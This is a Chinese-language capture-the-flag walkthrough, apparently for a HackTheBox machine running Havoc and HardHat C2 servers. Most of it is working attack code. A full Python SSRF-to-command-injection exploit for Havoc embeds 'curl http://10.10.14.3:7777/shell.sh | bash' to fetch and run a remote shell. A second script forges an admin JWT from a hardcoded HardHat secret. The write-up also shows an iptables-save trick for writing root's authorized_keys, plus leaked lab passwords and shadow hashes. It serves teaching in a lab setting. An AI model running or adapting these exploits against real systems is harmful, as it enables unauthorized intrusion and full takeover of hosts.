基本信息

端口扫描

22,443,和8000:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
$ nmap -sC -sV -Pn 10.10.11.49
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-20 12:59 CST
Nmap scan report for 10.10.11.49
Host is up (0.080s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey:
|   256 7d:6b:ba:b6:25:48:77:ac:3a:a2:ef:ae:f5:1d:98:c4 (ECDSA)
|_  256 be:f3:27:9e:c6:d6:29:27:7b:98:18:91:4e:97:25:99 (ED25519)
443/tcp  open  ssl/http nginx 1.22.1
|_http-title: 404 Not Found
|_http-server-header: nginx/1.22.1
| tls-alpn:
|   http/1.1
|   http/1.0
|_  http/0.9
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=127.0.0.1/organizationName=tech co/stateOrProvinceName=Florida/countryName=US
| Subject Alternative Name: IP Address:127.0.0.1
| Not valid before: 2024-12-15T08:39:10
|_Not valid after:  2027-12-15T08:39:10
8000/tcp open  http     nginx 1.22.1
| http-ls: Volume /
| SIZE  TIME               FILENAME
| 1559  17-Dec-2024 11:31  disable_tls.patch
| 875   17-Dec-2024 11:34  havoc.yaotl
|_
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Index of /
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.19 seconds

8000

443是404,8000可以看到两个文件:

8000 files

两个文件都是havoc相关的:

disable_tls.patch

disable_tls.patch查看内容是禁用40056端口websocket的tls,并且看到一个sergej应该是用户名:

havoc.yaotl

havoc.yaotl就是havoc的配置文件,其中可以看到Teamserver 40056端口,以及一些Operators信息:

1
2
3
4
5
6
7
8
9
Operators {
    user "ilya" {
        Password = "CobaltStr1keSuckz!"
    }

    user "sergej" {
        Password = "1w4nt2sw1tch2h4rdh4tc2"
    }
}

Havoc to ilya

根据已知的信息,这应该是个Havoc C2 server,在作者的github可以直接找到相关信息:

SSRF

验证存在SSRF:

1
python3 exploit.py --target https://10.10.11.49 -i 10.10.14.3 -p 4444

rce

rce漏洞看代码是向websocket发出特定请求触发的,而我们现在有SSRF,并且可以看到已经禁用了websocket的tls,所以需要做的就是通过SSRF发送websocket请求即可:

1
python3 Havoc-SSRF-RCE.py --target https://10.10.11.49 -i 127.0.0.1 -p 40056

最终打到ilya用户shell:

Havoc-SSRF-RCE.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
#!/usr/bin/env python3

import os
import json
import hashlib
import binascii
import random
import requests
import argparse
import urllib3
urllib3.disable_warnings()

from Crypto.Cipher import AES
from Crypto.Util import Counter

USER = "ilya"
PASSWORD = "CobaltStr1keSuckz!"

key_bytes = 32

def decrypt(key, iv, ciphertext):
	if len(key) <= key_bytes:
		for _ in range(len(key), key_bytes):
			key += b"0"
			
	assert len(key) == key_bytes
	
	iv_int = int(binascii.hexlify(iv), 16)
	ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)
	aes = AES.new(key, AES.MODE_CTR, counter=ctr)
	
	plaintext = aes.decrypt(ciphertext)
	return plaintext

def int_to_bytes(value, length=4, byteorder="big"):
	return value.to_bytes(length, byteorder)

def encrypt(key, iv, plaintext):
	
	if len(key) <= key_bytes:
		for x in range(len(key),key_bytes):
			key = key + b"0"
			
		assert len(key) == key_bytes
		
		iv_int = int(binascii.hexlify(iv), 16)
		ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)
		aes = AES.new(key, AES.MODE_CTR, counter=ctr)
		
		ciphertext = aes.encrypt(plaintext)
		return ciphertext
	
def register_agent(hostname, username, domain_name, internal_ip, process_name, process_id):
	# DEMON_INITIALIZE / 99
	command = b"\x00\x00\x00\x63"
	request_id = b"\x00\x00\x00\x01"
	demon_id = agent_id
	
	hostname_length = int_to_bytes(len(hostname))
	username_length = int_to_bytes(len(username))
	domain_name_length = int_to_bytes(len(domain_name))
	internal_ip_length = int_to_bytes(len(internal_ip))
	process_name_length = int_to_bytes(len(process_name) - 6)
	
	data =  b"\xab" * 100
	
	header_data = command + request_id + AES_Key + AES_IV + demon_id + hostname_length + hostname + username_length + username + domain_name_length + domain_name + internal_ip_length + internal_ip + process_name_length + process_name + process_id + data
	
	size = 12 + len(header_data)
	size_bytes = size.to_bytes(4, 'big')
	agent_header = size_bytes + magic + agent_id
	
	print("[***] Trying to register agent ...")
	r = requests.post(teamserver_listener_url, data=agent_header + header_data, headers=headers, verify=False)
	if r.status_code == 200:
		print("[***] Success!")
	else:
		print(f"[!!!] Failed to register agent - {r.status_code} {r.text}")
		
def open_socket(socket_id, target_address, target_port):
	# COMMAND_SOCKET / 2540
	command = b"\x00\x00\x09\xec"
	request_id = b"\x00\x00\x00\x02"
	
	# SOCKET_COMMAND_OPEN / 16
	subcommand = b"\x00\x00\x00\x10"
	sub_request_id = b"\x00\x00\x00\x03"
	
	local_addr = b"\x22\x22\x22\x22"
	local_port = b"\x33\x33\x33\x33"
	
	forward_addr = b""
	for octet in target_address.split(".")[::-1]:
		forward_addr += int_to_bytes(int(octet), length=1)
		
	forward_port = int_to_bytes(target_port)
	
	package = subcommand+socket_id+local_addr+local_port+forward_addr+forward_port
	package_size = int_to_bytes(len(package) + 4)
	
	header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)
	
	size = 12 + len(header_data)
	size_bytes = size.to_bytes(4, 'big')
	agent_header = size_bytes + magic + agent_id
	data = agent_header + header_data
	
	
	print("[***] Trying to open socket on the teamserver ...")
	r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)
	if r.status_code == 200:
		print("[***] Success!")
	else:
		print(f"[!!!] Failed to open socket on teamserver - {r.status_code} {r.text}")
		
def write_socket(socket_id, data, message):
	# COMMAND_SOCKET / 2540
	command = b"\x00\x00\x09\xec"
	request_id = b"\x00\x00\x00\x08"
	
	# SOCKET_COMMAND_READ / 11
	subcommand = b"\x00\x00\x00\x11"
	sub_request_id = b"\x00\x00\x00\xa1"
	
	# SOCKET_TYPE_CLIENT / 3
	socket_type = b"\x00\x00\x00\x03"
	success = b"\x00\x00\x00\x01"
	
	data_length = int_to_bytes(len(data))
	
	package = subcommand+socket_id+socket_type+success+data_length+data
	package_size = int_to_bytes(len(package) + 4)
	
	header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)
	
	size = 12 + len(header_data)
	size_bytes = size.to_bytes(4, 'big')
	agent_header = size_bytes + magic + agent_id
	post_data = agent_header + header_data
	
	print(message)
	r = requests.post(teamserver_listener_url, data=post_data, headers=headers, verify=False)
	if r.status_code == 200:
		print("[***] Success!")
	else:
		print(f"[!!!] Failed - {r.status_code} {r.text}")
		
def read_socket(socket_id):
	# COMMAND_GET_JOB / 1
	command = b"\x00\x00\x00\x01"
	request_id = b"\x00\x00\x00\x09"
	
	header_data = command + request_id
	
	size = 12 + len(header_data)
	size_bytes = size.to_bytes(4, 'big')
	agent_header = size_bytes + magic + agent_id
	data = agent_header + header_data
	
	
	print("[***] Trying to poll teamserver for socket output ...")
	r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)
	if r.status_code == 200:
		print("[***] Read socket output successfully!")
	else:
		print(f"[!!!] Failed to read socket output - {r.status_code} {r.text}")
		return ""
	
	command_id = int.from_bytes(r.content[0:4], "little")
	request_id = int.from_bytes(r.content[4:8], "little")
	package_size = int.from_bytes(r.content[8:12], "little")
	enc_package = r.content[12:]
	
	return decrypt(AES_Key, AES_IV, enc_package)[12:]

def create_websocket_request(HOST, PORT):
	request = (
		f"GET /havoc/ HTTP/1.1\r\n"
		f"Host: {HOST}:{PORT}\r\n"
		f"Upgrade: websocket\r\n"
		f"Connection: Upgrade\r\n"
		f"Sec-WebSocket-Key: 5NUvQyzkv9bpu376gKd2Lg==\r\n"
		f"Sec-WebSocket-Version: 13\r\n"
		f"\r\n"
	).encode()
	return request

def build_websocket_frame(payload):
	payload_bytes = payload.encode("utf-8")
	frame = bytearray()
	frame.append(0x81)
	payload_length = len(payload_bytes)
	if payload_length <= 125:
		frame.append(0x80 | payload_length)
	elif payload_length <= 65535:
		frame.append(0x80 | 126)
		frame.extend(payload_length.to_bytes(2, byteorder="big"))
	else:
		frame.append(0x80 | 127)
		frame.extend(payload_length.to_bytes(8, byteorder="big"))

	masking_key = os.urandom(4)
	frame.extend(masking_key)
	masked_payload = bytearray(byte ^ masking_key[i % 4] for i, byte in enumerate(payload_bytes))
	frame.extend(masked_payload)
	
	return frame

parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="The listener target in URL format", required=True)
parser.add_argument("-i", "--ip", help="The IP to open the socket with", required=True)
parser.add_argument("-p", "--port", help="The port to open the socket with", required=True)
parser.add_argument("-A", "--user-agent", help="The User-Agent for the spoofed agent", default="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36")
parser.add_argument("-H", "--hostname", help="The hostname for the spoofed agent", default="DESKTOP-7F61JT1")
parser.add_argument("-u", "--username", help="The username for the spoofed agent", default="Administrator")
parser.add_argument("-d", "--domain-name", help="The domain name for the spoofed agent", default="ECORP")
parser.add_argument("-n", "--process-name", help="The process name for the spoofed agent", default="msedge.exe")
parser.add_argument("-ip", "--internal-ip", help="The internal ip for the spoofed agent", default="10.1.33.7")

args = parser.parse_args()

# 0xDEADBEEF
magic = b"\xde\xad\xbe\xef"
teamserver_listener_url = args.target
headers = {
		"User-Agent": args.user_agent
}
agent_id = int_to_bytes(random.randint(100000, 1000000))
AES_Key = b"\x00" * 32
AES_IV = b"\x00" * 16
hostname = bytes(args.hostname, encoding="utf-8")
username = bytes(args.username, encoding="utf-8")
domain_name = bytes(args.domain_name, encoding="utf-8")
internal_ip = bytes(args.internal_ip, encoding="utf-8")
process_name = args.process_name.encode("utf-16le")
process_id = int_to_bytes(random.randint(1000, 5000))
ip = args.ip
port = args.port

#register agent
register_agent(hostname, username, domain_name, internal_ip, process_name, process_id)

#open socket
socket_id = b"\x11\x11\x11\x11"
open_socket(socket_id, args.ip, int(args.port))

#authenticate to teamserver
message="[***] Establishing connection to teamserver ..."
websocket_request = create_websocket_request(ip, port)
write_socket(socket_id, websocket_request,message)

message="[***] Authenticating to teamserver ..."
payload = {"Body": {"Info": {"Password": hashlib.sha3_256(PASSWORD.encode()).hexdigest(), "User": USER}, "SubEvent": 3}, "Head": {"Event": 1, "OneTime": "", "Time": "18:40:17", "User": USER}}
payload_json = json.dumps(payload)
frame = build_websocket_frame(payload_json)
write_socket(socket_id, frame,message)

#create listner
message="[***] Creating Listner ..."
payload = {"Body":{"Info":{"Headers":"","HostBind":"0.0.0.0","HostHeader":"","HostRotation":"round-robin","Hosts":"0.0.0.0","Name":"abc","PortBind":"443","PortConn":"443","Protocol":"Https","Proxy Enabled":"false","Secure":"true","Status":"online","Uris":"","UserAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"},"SubEvent":1},"Head":{"Event":2,"OneTime":"","Time":"08:39:18","User": USER}}
payload_json = json.dumps(payload)
frame = build_websocket_frame(payload_json)
write_socket(socket_id, frame, message)

#SSRF payload (comand injection)
message="[***] Injecting Command ..."
cmd = "curl http://10.10.14.3:7777/shell.sh | bash" #CHANGE ME
injection = """ \\\\\\\" -mbla; """ + cmd + """ 1>&2 && false #"""
payload = {"Body": {"Info": {"AgentType": "Demon", "Arch": "x64", "Config": "{\n \"Amsi/Etw Patch\": \"None\",\n \"Indirect Syscall\": false,\n \"Injection\": {\n \"Alloc\": \"Native/Syscall\",\n \"Execute\": \"Native/Syscall\",\n \"Spawn32\": \"C:\\\\Windows\\\\SysWOW64\\\\notepad.exe\",\n \"Spawn64\": \"C:\\\\Windows\\\\System32\\\\notepad.exe\"\n },\n \"Jitter\": \"0\",\n \"Proxy Loading\": \"None (LdrLoadDll)\",\n \"Service Name\":\"" + injection + "\",\n \"Sleep\": \"2\",\n \"Sleep Jmp Gadget\": \"None\",\n \"Sleep Technique\": \"WaitForSingleObjectEx\",\n \"Stack Duplication\": false\n}\n", "Format": "Windows Service Exe", "Listener": "abc"}, "SubEvent": 2}, "Head": {
"Event": 5, "OneTime": "true", "Time": "18:39:04", "User": USER}}
payload_json = json.dumps(payload)
frame = build_websocket_frame(payload_json)
write_socket(socket_id, frame,message)

user flag

获取ilya私钥方便后续操作,user.txt就在ilya用户目录:

hardhat to sergej

ilya用户目录可以看到一个hardhat.txt,查看可以知道是另一个C2,并且没有还有更改任何东西,默认配置:

根据文档知道hardhat主要是5000和7096两个端口,查看端口状态也可以看到这两个端口开放在本地,所以转发出来查看:

1
ssh -i ilya_id_rsa ilya@10.10.11.49 -L 5000:127.0.0.1:5000 -L 7096:127.0.0.1:7096

jwt auth bypass

我们没有hardhat的认证信息,但前面可以知道他是默认配置运行,而在代码中可以看到有硬编码的jwt key:

所以我们可以自己生成合法的jwt来认证hardcat,添加新用户方便后续操作:

rce

之后在HardHat控制面板中,可以运行任意命令,得到sergej:

hardhat-jwt.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import jwt
import datetime
import uuid
import requests

rhost = '127.0.0.1:5000'

# Craft Admin JWT
secret = "jtee43gt-6543-2iur-9422-83r5w27hgzaq"
issuer = "hardhatc2.com"
now = datetime.datetime.utcnow()

expiration = now + datetime.timedelta(days=28)
payload = {
	"sub": "HardHat_Admin",
	"jti": str(uuid.uuid4()),
	"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": "1",
	"iss": issuer,
	"aud": issuer,
	"iat": int(now.timestamp()),
	"exp": int(expiration.timestamp()),
	"http://schemas.microsoft.com/ws/2008/06/identity/claims/role": "Administrator"
}

token = jwt.encode(payload, secret, algorithm="HS256")
print("Generated JWT:")
print(token)

# Use Admin JWT to create a new user 'sth_pentest' as TeamLead
burp0_url = f"https://{rhost}/Login/Register"
burp0_headers = {
	"Authorization": f"Bearer {token}",
	"Content-Type": "application/json"
}

burp0_json = {
	"password": "pfapostol",
	"role": "TeamLead",
	"username": "pfapostol"
}

r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False)

print(r.text)

sergej to root

写公钥方便后续操作,sergej 可以sudo运行iptables和iptables-save:

而iptables可以添加comments写入限定长度内容,这样当save的时候,我们就有了一个任意写,例如写公钥:

1
2
3
4
5
ssh-keygen -t ed25519 -C "miao@miao"

sudo /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII3CaDtyVg2XCEs0/jekTzHh54ujvpbAEa9RMvmkd4KP miao@miao\n'

sudo /usr/sbin/iptables-save -f /root/.ssh/authorized_keys

shadow

1
2
3
root:$y$j9T$YhphiLO.G4w3yAv438MQP/$3JhvSgFS6VV4F79Mi5VuQDkhg63yMgjbpy.krot/tn.:19996:0:99999:7:::
ilya:$y$j9T$QAKBQrxLvdJTOvPiSUD8Z.$970OYpnfl/koGTRGPbmxntWv/HzGp5Nrjr7Vwfv6NXA:19996:0:99999:7:::
sergej:$y$j9T$ToRPOlaRsEcSVPj7IrwIw/$7WM.jKKviRj8JoXWN2pjVqrxuunYDv/G4b0PHmsEFd2:19996:0:99999:7:::

参考资料